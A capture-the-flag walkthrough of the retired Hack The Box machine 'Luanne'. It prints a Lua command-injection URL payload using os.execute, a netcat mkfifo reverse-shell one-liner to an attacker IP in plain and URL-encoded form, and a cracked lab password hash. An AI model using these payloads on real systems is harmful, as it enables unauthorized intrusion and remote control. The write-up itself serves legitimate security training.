Hack The Box

HackTheBox “Luanne” Walkthrough

Luanne, an easy-level Unix “NetBSD” OS machine on HackTheBox, through the Supervisor Process Manager, exploiting a command injection vulnerability in a Lua-backed API on port 80. That granted me access to a localhost…

Luanne, an easy-level Unix “NetBSD” OS machine on HackTheBox, through the Supervisor Process Manager, exploiting a command injection vulnerability in a Lua-backed API on port 80. That granted me access to a localhost web server, where an SSH key awaited, propelling me to the second user level. Armed with doas privileges, I cracked a hashed password from a backup file using PGP, attaining root access.

HackTheBox “Luanne” Walkthrough, figure 1

Let’s get started! 🚀

Recon & Enumeration

Let’s use nmap to full scan for open ports and services:

HackTheBox “Luanne” Walkthrough, figure 2

Check port 80.

HackTheBox “Luanne” Walkthrough, figure 3

Launching a directory scan.

HackTheBox “Luanne” Walkthrough, figure 4

Let’s see what we have inside robots.txt.

HackTheBox “Luanne” Walkthrough, figure 5

Initiate a dirsearch on the directory labeled “weather” found within the Disallow section.

HackTheBox “Luanne” Walkthrough, figure 6

Have a look at /weather/forecast.

HackTheBox “Luanne” Walkthrough, figure 7

Upon analyzing the JSON response, it reveals an error message indicating a missing city. To resolve this, we’ve appended the city parameter to the URL with the value “list,” as suggested, to obtain the complete list of available cities.

HackTheBox “Luanne” Walkthrough, figure 8

Experimenting with URL parameters and values, we appended a quote and semicolon marks after “list” to observe the response, resulting in a Lua error. The silver lining: the error provided both a directory path and a valuable error message.

HackTheBox “Luanne” Walkthrough, figure 9

Having dissected the query by introducing a quote and semicolon, our attempts to provoke an injection attack led us to experimenting with various parameters. After several iterations, success was achieved through Remote Command Execution utilizing os.execute. Employing the closing sequence '), separating commands with ;, and concluding with a Lua comment -- effectively sealed off the insertion, eliciting the warning message.

http://10.10.10.218/weather/forecast?city=list;')os.execute("cat /etc/passwd")--

HackTheBox “Luanne” Walkthrough, figure 10

Encoding the command for remote shell execution:

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f |/bin/sh -i 2>&1| nc 10.10.14.6 4343 >/tmp/f

HackTheBox “Luanne” Walkthrough, figure 11

Launch a listener.

HackTheBox “Luanne” Walkthrough, figure 12

We inject the URL-encoded reverse shell command:

http://10.10.10.218/weather/forecast?city=list;')os.execute(%22rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.6%204343%20%3E%2Ftmp%2Ff%22%0A%0A)--

HackTheBox “Luanne” Walkthrough, figure 13

Check our listener.

HackTheBox “Luanne” Walkthrough, figure 14

Upon executing the command, we swiftly acquired a shell on the target machine, allowing us to employ the ls command for clue discovery, ultimately unveiling the coveted .htpasswd file.

HackTheBox “Luanne” Walkthrough, figure 15

Let’s read htpasswd.

HackTheBox “Luanne” Walkthrough, figure 16

Discovered the hashed password for the user ‘webapi_user’:

webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

Let’s crack it using john:

HackTheBox “Luanne” Walkthrough, figure 17

The encryption revealed an MD5 hash, deciphered as “iamthebest,” providing access to the webapi_user’s password. Now, let’s proceed with further target enumeration.

HackTheBox “Luanne” Walkthrough, figure 18

I attempted to explore the contents of those directories, but found no accessible information. Now, let’s examine the active processes.

HackTheBox “Luanne” Walkthrough, figure 19

The r.michaels user initiated a process running another instance of weather.lua on port 3001. Attempted access using curl to retrieve the local page at 3001.

HackTheBox “Luanne” Walkthrough, figure 20

Encountering a “No Authorization” error on the identical page as port 80, I attempted to log in as the “webapi_user.”

HackTheBox “Luanne” Walkthrough, figure 21

Successfully retrieving the site, I observed its identical appearance to the one on port 80. Exploring the possibility of accessing the home directory, given the process was running as indicated by the tilde (~) in URLs.

HackTheBox “Luanne” Walkthrough, figure 22

Let’s append a forward slash after the ~r.michaels directory.

HackTheBox “Luanne” Walkthrough, figure 23

We got a directory listing, let’s see if we can get ssh private key.

$ curl -u [redacted retired-lab Basic Auth credential] localhost:3001/~r.michaels/id_rsa  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100  2610  100  2610    0     0   424k      0 --:--:-- --:--:-- --:--:--  424k[Redacted: openssh private key material from the authorized lab has been removed from this archive.]

Let’s ssh into the target using the id_rsa key.

HackTheBox “Luanne” Walkthrough, figure 24

Let’s have a look around.

HackTheBox “Luanne” Walkthrough, figure 25

Upon discovering the backups directory, we located an encoded backup file named devel_backup-2020–09–16.tar.gz.enc. Utilizing the netpgp command, we decrypted the file, aiming to decompress the files within.

HackTheBox “Luanne” Walkthrough, figure 26

Decompress.

HackTheBox “Luanne” Walkthrough, figure 27

Let’s have a look at those directories.

HackTheBox “Luanne” Walkthrough, figure 28

Let’s check .htpasswd.

HackTheBox “Luanne” Walkthrough, figure 29

Let’t crack the hash found using John.

HackTheBox “Luanne” Walkthrough, figure 30

Leveraging the cracked hash, we employed the doas command to access su privileges.

HackTheBox “Luanne” Walkthrough, figure 31

And we have a root shell.

Cheers.